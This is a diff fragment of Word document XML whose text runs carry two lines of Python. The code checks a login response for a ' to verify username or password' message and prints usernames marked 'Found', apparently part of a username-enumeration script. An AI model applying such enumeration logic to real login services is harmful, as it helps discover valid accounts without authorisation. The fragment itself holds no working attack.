+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to verify username or password" in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>r.content</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                print("{}: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Found".format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>(values["username"]))</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
